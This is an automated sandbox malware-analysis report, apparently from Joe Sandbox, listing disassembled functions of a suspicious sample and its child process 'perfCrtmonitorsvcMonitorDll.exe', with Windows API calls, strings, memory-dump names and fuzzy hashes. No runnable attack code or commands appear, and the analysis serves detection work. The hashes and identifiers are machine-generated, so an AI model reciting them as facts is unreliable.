Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: 9525505c98b8259d56561ae229067e945e560667a0ac6370a8ab58207529ab7b
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: E7C00134108A88D43C3A3AB2220A2B90B000862BD4FA260C2A9C01B103AE0F0A0FA432

Uniqueness

Uniqueness Score: -1.00%

Function 00729F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00729DF1: GetDC.USER32(00000000), ref: 00729DF5
Part of subcall function 00729DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00729E00
Part of subcall function 00729DF1: ReleaseDC.USER32(00000000,00000000), ref: 00729E0B

GetObjectW.GDI32(?,00000018,?), ref: 00729F8D

Part of subcall function 0072A1E5: GetDC.USER32(00000000), ref: 0072A1EE
Part of subcall function 0072A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0072A21D
Part of subcall function 0072A1E5: ReleaseDC.USER32(00000000,?), ref: 0072A2B5

Strings

(, xrefs: 0072A0A3

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: a881f92ff2c83169f2deb94c98c7307606b571dd713d1d26139e902ddc78d82c
Instruction ID: 371ac11d97a6d7fa465a34d24b0be270c7cd60603611161c978fc63108211203
Opcode Fuzzy Hash: a881f92ff2c83169f2deb94c98c7307606b571dd713d1d26139e902ddc78d82c
Instruction Fuzzy Hash: 44812475208314AFC714DF28D84492ABBF9FF89710F00891EF98AD7260DB79AD05DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00720E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00720FF1

Strings

%s: %s, xrefs: 00721000
%ls, xrefs: 00720E76, 00720E8C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 0960719bf1fa125783154a498a21f675dc444184b42fb9abe08c742f4c660fe2
Instruction ID: 2133ecef50cd4152f2a7680be951c106004ab13b79fc9fceedc9364b9f2bdd3d
Opcode Fuzzy Hash: 0960719bf1fa125783154a498a21f675dc444184b42fb9abe08c742f4c660fe2
Instruction Fuzzy Hash: B251293168C760FEEB302AA4FD56F363655B714F00F214906B3DA644E3C69E55E066A3

Uniqueness

Uniqueness Score: -1.00%

Function 0071772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00717730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007178CC

Part of subcall function 0071A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0071A27A,?,?,?,0071A113,?,00000001,00000000,?,?), ref: 0071A458
Part of subcall function 0071A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0071A27A,?,?,?,0071A113,?,00000001,00000000,?,?), ref: 0071A489

Strings

:, xrefs: 007177A1

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: a415ea683348a3ec45f866cbbf956bbac454d7fc6aff58c39429562daa568b3e
Instruction ID: a6712452d3760038ec5fbcc9e42763681b3d842fb3ba2a33cf1286ff9da6210e
Opcode Fuzzy Hash: a415ea683348a3ec45f866cbbf956bbac454d7fc6aff58c39429562daa568b3e
Instruction Fuzzy Hash: 2E414371905168EADB25EB58DD59EEEB37CAF45300F0040AAB609A20D2DB7C5FC9CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0071B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

\\?\, xrefs: 0071B6BE, 0071B6FA, 0071B75B, 0071B7AE
UNC, xrefs: 0071B708

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 62340a63a7406a1102d8b9e8032df360a65826e8988687129a51fd90a5f943a8
Instruction ID: 543f364d7319d3c34e0e703f94c8c360f1a3e48fbd3946f5816eebfb945c52eb
Opcode Fuzzy Hash: 62340a63a7406a1102d8b9e8032df360a65826e8988687129a51fd90a5f943a8
Instruction Fuzzy Hash: 6741B675400219EACF21AF69DC45EEF77ADAF85750F10402AF824A31D2D77CE9D4CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00728FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00728FC4

Strings

about:blank, xrefs: 00729082
Shell.Explorer, xrefs: 00728FEF

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 0d74082a2e5b63f26070cf3fe8d003a2f666ba973478b4ce1a8b572488749cd7
Instruction ID: e5113c7f840924c6b687548403b872a78a52944359dd23c470f3053b2c7165c7
Opcode Fuzzy Hash: 0d74082a2e5b63f26070cf3fe8d003a2f666ba973478b4ce1a8b572488749cd7
Instruction Fuzzy Hash: A8219371204325DFDB149F68E899A2A77A8FF44711F18C45EF9098B282DB79EC00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0072D44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,00010472,0072A990,?,?), ref: 0072D4C5

Strings

xjv, xrefs: 0072D4D5
GETPASSWORD1, xrefs: 0072D4BA

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$xjv
API String ID: 665744214-3764258211
Opcode ID: 11e401a16f1a2d136ec0d286569f0dd01f9fcaa8b4fdf3bf39414a42975528f1
Instruction ID: 91b946777181d4dad3842e205b5c42f69f3b37276be2a57f0c76c43a7067198f
Opcode Fuzzy Hash: 11e401a16f1a2d136ec0d286569f0dd01f9fcaa8b4fdf3bf39414a42975528f1
Instruction Fuzzy Hash: DA113B71600394ABDB32EE34AC06FEA3798B705751F148074BD49A7191D7FCAC84D764

Uniqueness

Uniqueness Score: -1.00%

Function 0071EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0071EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0071EB92
Part of subcall function 0071EB73: GetProcAddress.KERNEL32(007581C0,CryptUnprotectMemory), ref: 0071EBA2

GetCurrentProcessId.KERNEL32(?,?,?,0071EBEC), ref: 0071EC84

Strings

CryptProtectMemory failed, xrefs: 0071EC3B
CryptUnprotectMemory failed, xrefs: 0071EC7C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 1d7d33dae74f9481e3dd63324ec2144017b051cb700d917e02d04384b2ea6c6b
Instruction ID: b694d367141e81b4cecd5d22251a71e2492f6bcb71ecd1fcc748491ca23fae22
Opcode Fuzzy Hash: 1d7d33dae74f9481e3dd63324ec2144017b051cb700d917e02d04384b2ea6c6b
Instruction Fuzzy Hash: B7112631A05628ABDB159F3CDC06AEE3714AF41B21B048119FC056B2D1DBBDAE8187E9

Uniqueness

Uniqueness Score: -1.00%

Function 00739B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00739BBE
_free.LIBCMT ref: 00739BE4

Strings

Xt, xrefs: 00739C4B

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _free
String ID: Xt
API String ID: 269201875-2287795844
Opcode ID: 93950e8366d493e4348c8885f05013be8be698a7c7f89aa96b124ad3866edba5
Instruction ID: b9a28986d0742f66abb11ea9b320bbc98baa77a230e70f1202bd12caac3057ce
Opcode Fuzzy Hash: 93950e8366d493e4348c8885f05013be8be698a7c7f89aa96b124ad3866edba5
Instruction Fuzzy Hash: 2E11E671B103119AFB609B3CAC45B1633D5BB50770F044625F625CB6E3E7BCC8814785

Uniqueness

Uniqueness Score: -1.00%

Function 0072EC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0072F25E
___raise_securityfailure.LIBCMT ref: 0072F345

Strings

8w, xrefs: 0072F340

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8w
API String ID: 3761405300-2935420904
Opcode ID: 36633f75c95adaf5e2c77fbdf5aa0ea7c4f98bdf16c018d6ea65dc241bb4dcb9
Instruction ID: b58d626a9dc2e563ae381ed18d660aad9c07cb4f7f16624a188ebe9099c6ae40
Opcode Fuzzy Hash: 36633f75c95adaf5e2c77fbdf5aa0ea7c4f98bdf16c018d6ea65dc241bb4dcb9
Instruction Fuzzy Hash: 5C21E4B9610304DBD720EF64F9856547BB4BB49390F10986AF90CCB3A1E3F959C0CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00720889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,007209D0,?,00000000,00000000), ref: 007208AD
SetThreadPriority.KERNEL32(?,00000000), ref: 007208F4

Part of subcall function 00716E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00716EAF

Strings

CreateThread failed, xrefs: 007208B9

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: af8eb02bb24bb40bfd7c049c640762384b41335256681858e40759f6d6269107
Instruction ID: 609c0b9950dc02c89b8138d3802f067cde7188cfe936b85f5ae3febd820e6760
Opcode Fuzzy Hash: af8eb02bb24bb40bfd7c049c640762384b41335256681858e40759f6d6269107
Instruction Fuzzy Hash: 2401A2B5244315AFD7246B54FC86BA67399EB41712F20013EF98A521C2CAE9A88496B4

Uniqueness

Uniqueness Score: -1.00%

Function 0073B2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00738FA5: GetLastError.KERNEL32(?,00750EE8,00733E14,00750EE8,?,?,00733713,00000050,?,00750EE8,00000200), ref: 00738FA9
Part of subcall function 00738FA5: _free.LIBCMT ref: 00738FDC
Part of subcall function 00738FA5: SetLastError.KERNEL32(00000000,?,00750EE8,00000200), ref: 0073901D
Part of subcall function 00738FA5: _abort.LIBCMT ref: 00739023

_abort.LIBCMT ref: 0073B2E0
_free.LIBCMT ref: 0073B314

Strings

t, xrefs: 0073B30B

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: t
API String ID: 289325740-1107187082
Opcode ID: e0615cb8a82fce60b497a76b5577fbcc1691db62995b2f4782c07b0b003fa45a
Instruction ID: 5c7f3192330bb3fef4da504ac78c6dd6b8e8e547ac6d89362d76dda0a97fa404
Opcode Fuzzy Hash: e0615cb8a82fce60b497a76b5577fbcc1691db62995b2f4782c07b0b003fa45a
Instruction Fuzzy Hash: 08018476E01636DFE721AF59980525DB360FF04721F19420AF66467683CB3C6D418FC6

Uniqueness

Uniqueness Score: -1.00%

Function 0071130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0071DA98: _swprintf.LIBCMT ref: 0071DABE
Part of subcall function 0071DA98: _strlen.LIBCMT ref: 0071DADF
Part of subcall function 0071DA98: SetDlgItemTextW.USER32(?,0074E154,?), ref: 0071DB3F
Part of subcall function 0071DA98: GetWindowRect.USER32(?,?), ref: 0071DB79
Part of subcall function 0071DA98: GetClientRect.USER32(?,?), ref: 0071DB85

GetDlgItem.USER32(00000000,00003021), ref: 0071134F
SetWindowTextW.USER32(00000000,007435B4), ref: 00711365

Strings

0, xrefs: 0071130E

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 1e06cf9f6f1ec2a38120061f4df64d911d84f57a2fcffb00b66fdc592f54257a
Instruction ID: 14777b9df653e3c89981cf074159b63db364cfb9100691e629d67f0ab1c02cf8
Opcode Fuzzy Hash: 1e06cf9f6f1ec2a38120061f4df64d911d84f57a2fcffb00b66fdc592f54257a
Instruction Fuzzy Hash: 11F0AF3010024CA6DF255FA98C0DBE93B98BF12346F888018FE69589E1C77CC9D6EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0072084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00720A78,?), ref: 00720854
GetLastError.KERNEL32(?), ref: 00720860

Part of subcall function 00716E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00716EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00720869

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: d85acaeaf1cab3ecdccc658bac71af123fde8fd2f717a1caef07ae7f30d1b43a
Instruction ID: 47521828847fddf54debe20279a91d1d20c76fdb0a83941d0f662bbc7512f988
Opcode Fuzzy Hash: d85acaeaf1cab3ecdccc658bac71af123fde8fd2f717a1caef07ae7f30d1b43a
Instruction Fuzzy Hash: DFD05E75908030A6CB102728AC0EEEF791AAF52731F204729F63D691F5DB6D0A9582E9

Uniqueness

Uniqueness Score: -1.00%

Function 0071DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0071D32F,?), ref: 0071DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0071D32F,?), ref: 0071DA61

Strings

RTL, xrefs: 0071DA5B

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: f15c3aec838b8fda502abcb996069ba28567d9753c19706c087d3291df18c9ec
Instruction ID: f75b30bd25a8ac6adab129add1d1bae552f58035d6ae4bad55c6a280fecaf35a
Opcode Fuzzy Hash: f15c3aec838b8fda502abcb996069ba28567d9753c19706c087d3291df18c9ec
Instruction Fuzzy Hash: 7FC0127228535076D73417646C0DB8329499B11B11F15454DB149DA1E0D7EDDD408660

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: perfCrtmonitorsvcMonitorDll.exePID: 7720, Parent PID: 7668COMMON

Executed Functions

Function 00007FFD9BA9E9B0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817f72b1a38a0b9f9d374ff4465c7a0177b8453a0e9954cbbf305988d9d5cffb
Instruction ID: 67751ce96f33d20d8b2f6ad1c41c10d286922ca30438735a7c899a307aa35190
Opcode Fuzzy Hash: 817f72b1a38a0b9f9d374ff4465c7a0177b8453a0e9954cbbf305988d9d5cffb
Instruction Fuzzy Hash: 12511E71E09A5D8FDF94EB98C895BEDBBF1FF68301F11016AD00DE32A2DA7469458B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA91519 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e2a8a582a21e8986eb1c02fd936196d7b81502e515a8bb93033733e3332a18
Instruction ID: 60ba65bc55a0173d07c07a2454451d6b2244118929670b8f488f3a3e04ac64bd
Opcode Fuzzy Hash: 96e2a8a582a21e8986eb1c02fd936196d7b81502e515a8bb93033733e3332a18
Instruction Fuzzy Hash: E5418D71E1A60D8FEB64DF98C4646FCBBF1EF59314F56017AD009E72A2CA786A44DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA9162F Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f0902d87957a9d19a44c1eb13c384cbcc68aa04cc8aaddd1ce7ea689b737a09
Instruction ID: 820a7c63e045f4d7d6a267f3a79b7be6be16d8b1b962d091fe81d0480067c77d
Opcode Fuzzy Hash: 7f0902d87957a9d19a44c1eb13c384cbcc68aa04cc8aaddd1ce7ea689b737a09
Instruction Fuzzy Hash: A2211C71E1990D8FEB64EF98C4A46EDB7F1FF68311F15417AD00AE72A5CA786940DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA91085 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc49dc265e5ac773807a8fc060dd60a49ca18246654109153da469724c4cd2b5
Instruction ID: 51d9bf6e8eab328fa4e1f4078f9b833e5cbd5229e481f41c899f1a21f2fe640d
Opcode Fuzzy Hash: dc49dc265e5ac773807a8fc060dd60a49ca18246654109153da469724c4cd2b5
